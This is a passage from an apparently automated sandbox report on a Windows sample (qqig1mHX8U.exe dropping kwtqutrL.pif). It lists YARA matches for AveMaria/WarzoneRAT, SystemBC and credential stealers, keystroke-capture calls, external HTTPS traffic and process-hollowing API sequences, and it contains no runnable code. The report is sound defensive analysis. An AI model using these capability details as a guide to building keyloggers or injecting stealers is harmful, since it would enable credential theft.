00000015.00000002.2575772053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000400000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: qqig1mHX8U.exe, 00000000.00000003.2375336653.0000000000601000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.12:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 16.182.101.153:443 -> 192.168.2.12:49713 version: TLS 1.2
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_0040AD09 GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,CallNextHookEx, 10_2_0040AD09
Installs a raw input device (often for capturing keystrokes)
Source: qqig1mHX8U.exe, 00000000.00000003.2400002737.000000007EDF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_54fd826e-c

E-Banking Fraud
barindex
Yara detected AveMaria stealer
Source: Yara match File source: 10.3.kwtqutrL.pif.21165028.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21166898.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21165028.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.1.kwtqutrL.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Lrtuqtwk.PIF.20c3d258.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.1.kwtqutrL.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21f6a848.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21edfd88.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.211515e8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21edfd88.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.kwtqutrL.pif.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21166898.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21166898.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21152e58.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Lrtuqtwk.PIF.20c205e8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.kwtqutrL.pif.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21f6a848.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.kwtqutrL.pif.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.kwtqutrL.pif.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Lrtuqtwk.PIF.20c205e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2400002737.000000007EDF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2441581581.0000000021EDF000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2424443585.0000000021165000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2424018007.0000000021165000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000001.2536364319.000000000041A000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2423107004.0000000021155000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000001.2613500142.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2424461904.0000000021167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2424419773.0000000021151000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000001.2400116274.000000000041A000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3547503805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2575772053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2441581581.0000000021F6A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2572232052.0000000020C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 10.3.kwtqutrL.pif.21165028.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 10.3.kwtqutrL.pif.21165028.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.3.kwtqutrL.pif.21165028.0.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 10.3.kwtqutrL.pif.21165028.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 10.3.kwtqutrL.pif.21165028.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 10.3.kwtqutrL.pif.21165028.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 10.3.kwtqutrL.pif.21165028.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 10.3.kwtqutrL.pif.21166898.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 10.3.kwtqutrL.pif.21166898.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.3.kwtqutrL.pif.21166898.6.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 10.3.kwtqutrL.pif.21166898.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 10.3.kwtqutrL.pif.21166898.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 10.3.kwtqutrL.pif.21165028.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 10.3.kwtqutrL.pif.21165028.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.3.kwtqutrL.pif.21165028.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 10.3.kwtqutrL.pif.21165028.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 10.3.kwtqutrL.pif.21165028.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 10.3.kwtqutrL.pif.21165028.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 10.3.kwtqutrL.pif.21165028.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 23.1.kwtqutrL.pif.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 23.1.kwtqutrL.pif.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 23.1.kwtqutrL.pif.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 23.1.kwtqutrL.pif.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 23.1.kwtqutrL.pif.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 19.2.Lrtuqtwk.PIF.20c3d258.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 19.2.Lrtuqtwk.PIF.20c3d258.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 19.2.Lrtuqtwk.PIF.20c3d258.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 19.2.Lrtuqtwk.PIF.20c3d258.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 19.2.Lrtuqtwk.PIF.20c3d258.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 0.2.qqig1mHX8U.exe.21f874b8.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 23.1.kwtqutrL.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 23.1.kwtqutrL.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 23.1.kwtqutrL.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 23.1.kwtqutrL.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 23.1.kwtqutrL.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 23.1.kwtqutrL.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 23.1.kwtqutrL.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 0.2.qqig1mHX8U.exe.21f6a848.10.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0.2.qqig1mHX8U.exe.21f6a848.10.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 0.2.qqig1mHX8U.exe.21f6a848.10.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.qqig1mHX8U.exe.21f6a848.10.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.qqig1mHX8U.exe.21f6a848.10.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 0.2.qqig1mHX8U.exe.21efc9f8.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 10.3.kwtqutrL.pif.211515e8.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 10.3.kwtqutrL.pif.211515e8.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.3.kwtqutrL.pif.211515e8.4.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 10.3.kwtqutrL.pif.211515e8.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 10.3.kwtqutrL.pif.211515e8.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 10.3.kwtqutrL.pif.211515e8.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 10.3.kwtqutrL.pif.211515e8.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 21.2.kwtqutrL.pif.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 21.2.kwtqutrL.pif.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 21.2.kwtqutrL.pif.400000.7.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 21.2.kwtqutrL.pif.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 21.2.kwtqutrL.pif.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 21.2.kwtqutrL.pif.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 21.2.kwtqutrL.pif.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 10.3.kwtqutrL.pif.21166898.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 10.3.kwtqutrL.pif.21166898.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.3.kwtqutrL.pif.21166898.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 10.3.kwtqutrL.pif.21166898.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 10.3.kwtqutrL.pif.21166898.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 10.3.kwtqutrL.pif.21166898.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 10.3.kwtqutrL.pif.21166898.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.3.kwtqutrL.pif.21166898.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 10.3.kwtqutrL.pif.21166898.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 10.3.kwtqutrL.pif.21166898.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 10.3.kwtqutrL.pif.21152e58.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 10.3.kwtqutrL.pif.21152e58.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.3.kwtqutrL.pif.21152e58.5.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 10.3.kwtqutrL.pif.21152e58.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 10.3.kwtqutrL.pif.21152e58.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 10.3.kwtqutrL.pif.21152e58.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 10.3.kwtqutrL.pif.21152e58.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 19.2.Lrtuqtwk.PIF.20c205e8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 19.2.Lrtuqtwk.PIF.20c205e8.2.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 19.2.Lrtuqtwk.PIF.20c205e8.2.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 19.2.Lrtuqtwk.PIF.20c205e8.2.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 19.2.Lrtuqtwk.PIF.20c205e8.2.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 10.2.kwtqutrL.pif.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 10.2.kwtqutrL.pif.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.kwtqutrL.pif.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 10.2.kwtqutrL.pif.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 10.2.kwtqutrL.pif.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 0.2.qqig1mHX8U.exe.21f6a848.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0.2.qqig1mHX8U.exe.21f6a848.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.qqig1mHX8U.exe.21f6a848.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.qqig1mHX8U.exe.21f6a848.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 0.2.qqig1mHX8U.exe.21f6a848.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 10.2.kwtqutrL.pif.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 10.2.kwtqutrL.pif.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.kwtqutrL.pif.400000.4.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 10.2.kwtqutrL.pif.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 10.2.kwtqutrL.pif.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 10.2.kwtqutrL.pif.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 10.2.kwtqutrL.pif.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 21.2.kwtqutrL.pif.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 21.2.kwtqutrL.pif.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 21.2.kwtqutrL.pif.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 21.2.kwtqutrL.pif.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 21.2.kwtqutrL.pif.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 19.2.Lrtuqtwk.PIF.20c205e8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 19.2.Lrtuqtwk.PIF.20c205e8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 19.2.Lrtuqtwk.PIF.20c205e8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 19.2.Lrtuqtwk.PIF.20c205e8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 00000000.00000003.2400002737.000000007EDF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000000.00000002.2441581581.0000000021EDF000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0000000A.00000003.2424443585.0000000021165000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0000000A.00000003.2424018007.0000000021165000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000015.00000001.2536364319.000000000041A000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0000000A.00000003.2423107004.0000000021155000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000017.00000001.2613500142.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000017.00000001.2613500142.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000017.00000001.2613500142.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: AveMaria_WarZone Author: unknown
Source: 00000017.00000001.2613500142.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 00000017.00000001.2613500142.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects SystemBC Author: ditekSHen
Source: 0000000A.00000003.2424461904.0000000021167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0000000A.00000003.2424419773.0000000021151000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0000000A.00000001.2400116274.000000000041A000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0000000A.00000002.3547503805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0000000A.00000002.3547503805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000A.00000002.3547503805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: AveMaria_WarZone Author: unknown
Source: 0000000A.00000002.3547503805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0000000A.00000002.3547503805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects SystemBC Author: ditekSHen
Source: 00000015.00000002.2575772053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000015.00000002.2575772053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000015.00000002.2575772053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: AveMaria_WarZone Author: unknown
Source: 00000015.00000002.2575772053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 00000015.00000002.2575772053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects SystemBC Author: ditekSHen
Source: 00000000.00000002.2441581581.0000000021F6A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000013.00000002.2572232052.0000000020C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Contains functionality to call native functions
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F28670 NtUnmapViewOfSection, 0_2_02F28670
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F28400 NtReadVirtualMemory, 0_2_02F28400
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F27A2C NtAllocateVirtualMemory, 0_2_02F27A2C
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F2DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 0_2_02F2DC8C
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F2DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_02F2DC04
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F28D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 0_2_02F28D70
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F2DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 0_2_02F2DD70
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F27D78 NtWriteVirtualMemory, 0_2_02F27D78
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F27A2A NtAllocateVirtualMemory, 0_2_02F27A2A
